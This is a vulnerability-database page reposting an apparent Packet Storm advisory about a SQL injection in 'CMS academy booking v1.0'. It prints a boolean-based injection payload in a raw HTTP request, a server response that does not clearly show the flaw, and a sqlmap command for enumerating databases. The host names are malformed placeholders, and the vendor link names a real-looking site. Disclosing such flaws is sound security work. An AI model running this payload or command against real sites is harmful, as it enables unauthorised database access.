Lucene search
K

📄 CMS Academy Booking 1.0 SQL Injection

🗓️ 18 Jun 2026 00:00:00Reported by indoushkaType 
packetstorm
 packetstorm
🔗 packetstorm.news👁 46 Views

CMS academy booking version 1.0 has a database injection vulnerability.

Code
==================================================================================================================================
    | # Title     : CMS academy booking v1.0 sql injection vulnerability                                                             |
    | # Author    : indoushka                                                                                                        |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 151.0.3 (64 bits)                                                 |
    | # Vendor    : https://www.cookwithping.com/Home/test.php                                                                       |
    ==================================================================================================================================
    
    [+] Summary    : CMS academy booking v1.0 suffer from sql injection vulnerability.
    
    [+] Payload     :  
    
    GET /Home/index.php?home=news-detail&id=29%20AND%203*2*1%3d6%20AND%20593%3d593 HTTP/1.1
    X-Requested-With: XMLHttpRequest
    Referer: https://www.127.0.01.com/Home/index.php?home=treatment-detail&treatment_id=29
    Cookie: PHPSESSID=4k9krjvjjhmcdjh99qsd4pce4d
    Host: www.127.0.0.1.com
    Connection: Keep-alive
    Accept-Encoding: gzip,deflate
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
    Accept: */*
    Response
    
    HTTP/1.1 200 OK
    Server: nginx
    Date: Sun, 14 Jun 2026 13:32:02 GMT
    Content-Type: text/html; charset=UTF-8
    Content-Length: 17160
    Connection: keep-alive
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    Vary: Accept-Encoding,User-Agent
    Original-Content-Encoding: gzip
    
    
    [+] POC        :  E:\sqlmap>python sqlmap.py -u "https://www.127.0.0.1.com/Home/index.php?home=treatment-detail&treatment_id=29" --risk=3 --level=5 --random-agent --user-agent -v3 --batch --threads=10 --dbs
    
    
    
    
    Greetings to :==============================================================================
    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
    ============================================================================================

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

18 Jun 2026 00:00Current
5.8Medium risk
Vulners AI Score5.8
46